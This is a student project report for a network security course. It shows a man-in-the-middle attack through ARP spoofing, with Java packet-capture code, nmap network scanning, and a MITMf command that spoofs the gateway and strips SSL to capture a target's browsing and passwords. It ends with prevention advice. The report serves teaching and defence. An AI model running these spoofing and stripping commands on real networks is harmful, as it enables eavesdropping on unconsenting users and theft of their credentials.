MAN IN THE MIDDLE ATTACKS USING

ARP SPOOFING

A PROJECT REPORT

Submitted by :

Divyanshu Nandwani (16BCI0127)

Kumod Arya (16BI0172)

Course Code: CSE 2008

Course Title: Network Security

Under the guidance of

Dr. Anil Kumar
Professor, SCOPE
VIT University, Vellore.

SCHOOL OF COMPUTER SCIENCE

AND ENGINEERING

OCTOBER 2018
 INDEX

1. Introduction
1.1. ARP and ARP Table

1.2. How ARP works

2. Background of the Work
2.1. Security and Man in the Middle Attacks

2.2. Existing ways to perform MITM

3. Overview of the Work
3.1. Problem description

3.2. Working

3.3. Design description

4. Implementation
4.1. Modules/Softwares Used
4.2. Source Code
4.3. Test cases and Execution snapshots
5. Prevention
6. Conclusion
7. References
 INTRODUCTION

1.1) ARP and ARP Table

The Address Resolution Protocol (ARP) is a communication protocol used for

discovering the link layer address, such as a MAC address, associated with a

given internet layer address, typically an IPv4 address. This mapping is a critical

function in the Internet protocol suite

A table, usually called the ARP cache, is used to maintain a correlation between
each MAC address and its corresponding IP address. ARP provides the protocol

rules for making this correlation and providing address conversion in both

directions.

1.2) How ARP Works

When an incoming packet destined for a host machine on a particular local area
network arrives at a gateway, the gateway asks the ARP program to find a
physical host or MAC address that matches the IP address. The ARP program
looks in the ARP cache and, if it finds the address, provides it so that the packet
can be converted to the right packet length and format and sent to the machine.
If no entry is found for the IP address, ARP broadcasts a request packet in a
special format to all the machines on the LAN to see if one machine knows that it
has that IP address associated with it. A machine that recognizes the IP address
as its own returns a reply so indicating. ARP updates the ARP cache for future
reference and then sends the packet to the MAC address that replied.
 Background of Work

2.1) Security and Man in the Middle Attack

A man in the middle (MITM) attack is a general term for when a perpetrator
positions himself in a conversation between a user and an application—either to
eavesdrop or to impersonate one of the parties, making it appear as if a normal
exchange of information is underway.
The goal of an attack is to steal personal information, such as login credentials,
account details and credit card numbers. Targets are typically the users of
financial applications, SaaS businesses, e-commerce sites and other websites
where logging in is required.
Information obtained during an attack could be used for many purposes,
including identity theft, unapproved fund transfers or an illicit password change.
2.1) Existing ways to perform MITM

Attackers wishing to take a more active approach to interception may launch one
of the following attacks:

 IP spoofing involves an attacker disguising himself as an application by

altering packet headers in an IP address. As a result, users attempting to
access a URL connected to the application are sent to the attacker’s
website.

 ARP spoofing is the process of linking an attacker’s MAC address with the
IP address of a legitimate user on a local area network using fake ARP
messages. As a result, data sent by the user to the host IP address is
instead transmitted to the attacker.

 DNS spoofing, also known as DNS cache poisoning, involves infiltrating a

DNS server and altering a website’s address record. As a result, users
attempting to access the site are sent by the altered DNS record to the
attacker’s site.
 Overview of Work

3.1) Problem Description

Performing Man in the Middle Attack using ARP spoofing

3.2) Working

1.) Two devices on the same WiFi network are taken.

2.) One will act as user and the other device will perform the attack.

3.) Java code will fetch all the ARP Packet details such as sha, sha length, spa,
srcIP, IP, caplen etc.

4.) The above fetched information will now be used to perform MITM attack.

5.) Now link the attacker’s MAC address with the IP address of a user on a local
area network. Thus, the ARP table will be modified and will lead to ARP spoofing.

6.) Now, Data sent by the user to the host IP address is instead transmitted to the
attacker. The websites will now be forced to open in HTTP mode.

7.) The websites visited, email id, passwords, screenshot of website and whatever
the user types can be fetched.

3.3) Design description

We will be using Java to fetch details like sha, sha length, IP , and all other ARP
Packet details. Then the ARP tables will be spoofed via linux from the attacker’s
machine. Once the commands and the code runs, all the website that the user
visits are forced to open in HTTP mode, and can be viewed on the machine which
attacked.
 Implementation
4.1) Modules/Softwares Used

a.) Java :

Java code will fetch all the ARP Packet details such as sha, sha length, spa, srcIP,
IP, caplen etc.

b.) Linux :

To access the ARP tables, modify them and perform MITM attack with libraries.

4.2) Source Code and Commands used

4.2.1) Java Code

import java.util.ArrayList;
import java.util.List;
import org.jnetpcap.Pcap;
import org.jnetpcap.PcapIf;
import org.jnetpcap.packet.PcapPacket;
import org.jnetpcap.packet.PcapPacketHandler;
import org.jnetpcap.protocol.network.Ip4;
import org.jnetpcap.protocol.network.Arp;
import org.jnetpcap.packet.format.FormatUtils;
public class PackageCapture {
public static void main(String[] args) {
List<PcapIf> alldevs = new ArrayList<PcapIf>();
StringBuilder errbuf = new StringBuilder();
int r = Pcap.findAllDevs(alldevs, errbuf);
if (r != Pcap.OK || alldevs.isEmpty()) {
System.err.printf("Unable to read devices, error is
%s",
errbuf.toString());
return;
}
System.out.println("Following network interfaces were
found:");
int i = 0;
for (PcapIf device : alldevs) {
String description = (device.getDescription() != null)
? device
 .getDescription() : "No description
available";
System.out.printf("#%d: %s [%s]\n", i++,
device.getName(),
description);
}
PcapIf device = alldevs.get(4);
System.out.printf("\nChoosing '%s' on your behalf:\n",
(device.getDescription() != null) ?
device.getDescription()
: device.getName());
int snaplen = 64 * 1024;
int flags = Pcap.MODE_PROMISCUOUS;
int timeout = 10 * 1000;
Pcap pcap = Pcap.openLive(device.getName(), snaplen, flags,
timeout, errbuf);
if (pcap == null) {
System.err.printf("Error while opening device for
capture: "
+ errbuf.toString());
return;
}
PcapPacketHandler<String> jpacketHandler = new
PcapPacketHandler<String>() {
public void nextPacket(PcapPacket packet, String user)
{
byte[] data = packet.getByteArray(0,
packet.size());
byte[] sIP = new byte[4];
byte[] dIP = new byte[4];
Ip4 ip = new Ip4();
Arp arp=new Arp();
if (packet.hasHeader(arp))
{

//System.out.println("ARP decode header:\t" +

arp.decodeHeader());
//System.out.println("ARP hardware type:\t" +
arp. hardwareType());
System.out.println("ARP hw type descr:\t" +
arp.hardwareTypeDescription());
System.out.println("ARP hw type enum:\t" +
arp.hardwareTypeEnum());
// System.out.println("ARP hlen:\t-\t" +
arp.hlen());
// System.out.println("ARP operation:\t-\t" +
arp.operation());
// System.out.println("ARP plen:\t-\t" +
arp.plen());
System.out.println("ARP protocol type:\t" +
arp.protocolType());
 System.out.println("ARP prtcl type descr:\t" +
arp.protocolTypeDescription());
System.out.println("ARP prtcl type enum:\t" +
arp.protocolTypeEnum());
System.out.println("ARP sha:\t-\t" +
FormatUtils.mac(arp.sha()));
System.out.println("ARP sha length:\t-\t" +
arp.shaLength());
System.out.println("ARP spa:\t-\t" +
FormatUtils.ip(arp.spa()));
// System.out.println("ARP spa length:\t-\t" +
arp.spaLength());
// System.out.println("ARP spa offset:\t-\t" +
arp.spaOffset());
// System.out.println("ARP tha:\t-\t" +
FormatUtils.mac(arp.tha()));
// System.out.println("ARP tha length:\t-\t" +
arp.thaLength());
// System.out.println("ARP tha offset:\t-\t" +
arp.thaOffset());
// System.out.println("ARP tpa:\t-\t" +
FormatUtils.ip(arp.tpa()));
// System.out.println("ARP tpa length:\t-\t" +
arp.tpaLength());
// System.out.println("ARP tpa offset:\t-\t" +
arp.tpaOffset());
System.out.println("ARP Packet!");
//readdata = true;
}
if (packet.hasHeader(ip) == false) {
return; // Not IP packet
}
ip.source(sIP);
ip.destination(dIP);
/* Use jNetPcap format utilities */
String sourceIP =
org.jnetpcap.packet.format.FormatUtils.ip(sIP);
String destinationIP =
org.jnetpcap.packet.format.FormatUtils.ip(dIP);

System.out.println("srcIP=" + sourceIP +
" dstIP=" + destinationIP +
" caplen=" +
packet.getCaptureHeader().caplen());
}
};

pcap.loop(1000, jpacketHandler, "jNetPcap");

pcap.close();
}
}
 4.2.2) Linux Terminal Commands

 Arp – a (to view ARP tables: IP and physical address of user aand attacker)

 Nmap -sn 192.168.43.1-255 (Nmap is used for exploring networks, perform

security scans, network audit and finding open ports on remote machine)

 Mitmf - - arp - - spoof - - gateway 192.168.43.1(attacker’s IP) - -target

192.168.43.27 (target’s IP) (desktop) -i wlan0

The ssl strip will force the websites to be opened in http mode so that there’s no
security.

4.3) Test Cases and Execution Snapshots

Output given after executing the java code

Output of arp-a on user machine

Starting mitm framework on linux

 Enabling ARP spoofing on linux

All the websites visited by the user can be seen on attacker’s machine
Screenshots of the website visited by the user saved

Screenshot of the website visited by the user

 MAN IN THE MIDDLE ATTACK PREVENTION

Blocking MITM attacks requires several practical steps on the part of users, as
well as a combination of encryption and verification methods for applications.
For users, this means:

 Avoiding WiFi connections that aren’t password protected.

 Paying attention to browser notifications reporting a website as being
unsecured.
 Immediately logging out of a secure application when it’s not in use.
 Not using public networks (e.g., coffee shops, hotels) when conducting
sensitive transactions.

For website operators, secure communication protocols, including TLS and

HTTPS, help mitigate spoofing attacks by robustly encrypting and
authenticating transmitted data. Doing so prevents the interception of site
traffic and blocks the decryption of sensitive data, such as authentication
tokens.
It is considered best practice for applications to use SSL/TLS to secure every
page of their site and not just the pages that require users to log in. Doing so
helps decreases the chance of an attacker stealing session cookies from a
user browsing on an unsecured section of a website while logged in.’
 Conclusion
Thus, it was seen that on a same network, if the IP address of devices are
known, and ARP table is known, Man in the middle attack can be performed by
ARP spoofing and changing the IP and Mac address mapping.

Also, if the website is not protected by SSL, it makes it even easier. Thus
paying attention to security is very important. Unprotected websites and
public WiFi should not be used.
 References

1.) A survey on ARP cache poisoning and techniques for detection and
mitigation
by Jitta Sai Meghana ; T. Subashri ; K.R. Vimal
https://ieeexplore.ieee.org/document/8085417

2.) https://www.incapsula.com/web-application-security/man-in-the-
middle-mitm.html

3.) https://www.simplified.guide/linux/sniff-network-traffic

4.) A security framework against ARP spoofing

By Ravi Raj Saini ; Himanshu Gupta
https://ieeexplore.ieee.org/document/7359227

5.) Persistent effects of man-in-the-middle attacks by Ronnie Swanink

https://www.cs.ru.nl/bachelors-
theses/2015/Ronnie_Swanink___4382838___Persistent-effects-of-man-
in-the-middle-attacks.pdf

6.) Man-in-the-Middle Attack to the HTTPS Protocol

By Franco Callegati ; Walter Cerroni ; Marco Ramilli
https://ieeexplore.ieee.org/document/4768661
 7.) D.C.Plummer, “An Ethernet address resolution protocol”, Rfc
826,InterNet Network Working Group, 1982.

8.) A Survey of Man In The Middle Attacks

By Mauro Conti ; Nicola Dragoni ; Viktor Lesyk
https://ieeexplore.ieee.org/document/7442758

9.) Man-in-the-middle attack in HTTP/2

By Parth Patni Kartik Iyer ; Rohan Sarode ; Amit Mali ; Anant Nimkar
https://ieeexplore.ieee.org/document/8321787

10.) Stealth and semi-stealth MITM attacks, detection and defense in

IPv4 networks
By Naga Rohit Samineni ; Ferdous A. Barbhuiya ; Sukumar Nandi
https://ieeexplore.ieee.org/document/6449847